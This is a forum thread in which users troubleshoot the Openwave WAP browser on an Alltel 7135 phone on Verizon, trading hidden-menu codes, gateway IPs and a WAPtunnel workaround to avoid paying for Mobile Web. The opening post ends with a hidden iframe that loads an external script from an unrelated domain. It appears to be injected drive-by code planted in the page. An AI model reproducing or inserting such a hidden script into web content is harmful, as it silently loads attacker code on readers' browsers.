+ Reply to Thread

Openwave Browser Doesn't Work

I have an Alltel 7135 (with old firmware) that seems to work "ok" for the most part on VZW. I do have the caller ID bug which has been discussed although it is intermittent. What has NEVER worked is the Openwave browser. I know it really is worthless, but still curious as to why. I changed the IP address to VZW's and it still doesn't work. It appears to be dowloading something, but usually displays nothing. Any ideas??<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Openwave Browser Doesn't Work

Originally posted by sndtubes
    I have an Alltel 7135 (with old firmware) that seems to work "ok" for the most part on VZW. I do have the caller ID bug which has been discussed although it is intermittent. What has NEVER worked is the Openwave browser. I know it really is worthless, but still curious as to why. I changed the IP address to VZW's and it still doesn't work. It appears to be dowloading something, but usually displays nothing. Any ideas??
    Do you have EXpress Network? You can't have both (although I believe I heard that was a setting in the phone, not the network....).

Do you have Mobile Web account with VZW? You can't use Openwave without a Mobile Web account.

Alan

Do a search here on waptunnel if you want to verify Openwave Browser and you don't have Mobileweb on your account.

Just wanted to let you know you can get OpenWave Browser to work without EN. Follow these steps:

1) Go to the PHONE menu (shows time, date, signal strength battery, etc.)
    2) Dial 111111
    3) Scroll down to Options (becomes available after entering 111111).
    4) Go to WAP Browser Setup
    5) Enter the following data for UP.LinkA (connects you to WAPtunnel)
    1st IP Addr 207.232.99.109
    1st Port 9201
    2nd IP Addr 207.232.99.109
    2nd Port 9201
    6) Press OK
    7) Go to your OpenWave Browser and click on it. You will have to change the URL (Verizon will not let you connect to www.openwave.com without EN). You may use any WAP URL you wish. I personally use www.google.com/wml for Google. Your all set. Openwave Browser should be working for you.

FYI:
    WAPtunnel is a free service
    You will not be able to use the bookmark buttons on the screen, I think these were designed to interface specifically with www.openwave.com The "Home" button works as well as the "browser setup" button.

I have been at a loss to find good WAP websites, so if anyone knows of some, please post. I've found CNN and Yahoo to be of some use. I rarely use the WAP browser, I find EIS to be much more useful personally.

Aaron

I tried it and it didn't work for me.

Originally posted by Lnoble
    I tried it and it didn't work for me.
    Won't work if you have Express Network (although I think that could be changed by a setting available in KWPST, I don't know what the setting is). This is for doing "free" (comes out of minutes) WAP without paying for Mobile Web.

Personally, if I want to go to a WAP site, I just use the Blazer browser on either EN or QNC. It is a better browser then Openwave for wap sites anyway.

Alan

Thanks everyone for the suggestions, but they don't work. I'm not sure what that IP is suggested by fallstaffpac, but it doesn't work. I was using the IP given to my by VZW. I can't even change anything as pressing any of the buttons at the bottom of the browser screen usually results in no change in the screen. I don't have EN, btw, I'm waiting for the "special offer" when the phone is finally released. I do have Mobile Web, though. I probably would rarely use Openwave, anyway. I just was curious as to why it wouldn't work. I have no problems using Eudora or EIS web (other than being slow).

Dang, I hate to hear about someone paying good money for something that doesn't work. I rarely use it since Verizon's WAP service is pretty poor. Sprint was much more reliable and I used it a lot on my dumb phone. I just haven't turned it off yet on my 7135. What Browser IP settings did you use? I didn't see anything in a FAQ but there were settings mentioned in this thread:
    http://www.smartphonesource.com/vbul...t=wap+settings

My settings that worked on my Alltel phone differed from the one mentioned in the above thead:

153.114.115.100 for port 9203
    and
    153.114.116.100 for port 9203

My current Verizon logo phone only has the 1st IP address entered and it works also.

Waptunnel worked on my Alltel phone (haven't tried it ) as defined above by falstaffpac.

There must be a reason that it is not working for you.

Originally posted by Beryl
    Dang, I hate to hear about someone paying good money for something that doesn't work. I rarely use it since Verizon's WAP service is pretty poor. Sprint was much more reliable and I used it a lot on my dumb phone. I just haven't turned it off yet on my 7135. What Browser IP settings did you use? I didn't see anything in a FAQ but there were settings mentioned in this thread:
    http://www.smartphonesource.com/vbul...t=wap+settings

My settings that worked on my Alltel phone differed from the one mentioned in the above thead:

153.114.115.100 for port 9203
    and
    153.114.116.100 for port 9203

My current Verizon logo phone only has the 1st IP address entered and it works also.

Waptunnel worked on my Alltel phone (haven't tried it ) as defined above by falstaffpac.

There must be a reason that it is not working for you.

"I did all this, and now I get this question:
    Security is not enabled. Enabling security can take several minutes. Proceed?"

To which I say "Yes"

Then I get this error:
    "Security error: key not recognized"

So what am I forgetting? I have QNC up and running.

--John

Originally posted by zucchero
    "I did all this, and now I get this question:
    Security is not enabled. Enabling security can take several minutes. Proceed?"

To which I say "Yes"

Then I get this error:
    "Security error: key not recognized"

So what am I forgetting? I have QNC up and running.

--John
    Don't have QNC up and running. OpenWave establishes it's own connection totally seperate from QNC. You are probably having a conflict between the two.

Alan

QNC is not running when I try Openwave. If it is, Openwave tells you to close it, so that isn't the problem. I actually get connected. The phone seems to be exchanging information with the server. It is just that rarely does anything show up on the screen. Once in a great while I'll get what looks like a proper menu, but if I try to access any of the items, I get the same old result which is usually a blank screen with a button or two at the bottom which will say "more" or "menu" or "Go" or "ok". Pressing any of the buttons gets the same result of more blank screens with meaningless buttons. I got the IP address from VZW tech support. They solved the original problem of "security key wrong" messages. This is my second 7135. Both of them have behaved exactly the same way with Openwave. I kind of think the problem may be solved when I can finally get the stupid thing flashed at a VZW store which is hope is very soon. Thanks again, everyone. I love this website.

Oh, by the way, the IP I am using is 199.74.153.210 port 9203

I've seen that error message initially on my newly activated 7135 & 2235 phones. It usually stops after I've been active for a while. It may be your firmware but I doubt it. I've also seen a similar message when VZW's network is having trouble.

try contacting your provider to do a hard reset of the browser to the ip address

Dreaderus

WAP Browser

Please excuse my ignorance, but could someone enlighten me as to what "WAP" is? In my very limited understanding, it seems to refer to a type of web site for a wireless device??

Thanks!

WAP stands for Wireless Access Protocol. You've got it right, it's basically a protocol which "dumbs down" normal web content. This allows it to be viewed from devices, like cell phones, with limitations such as tiny screens, text-only, etc..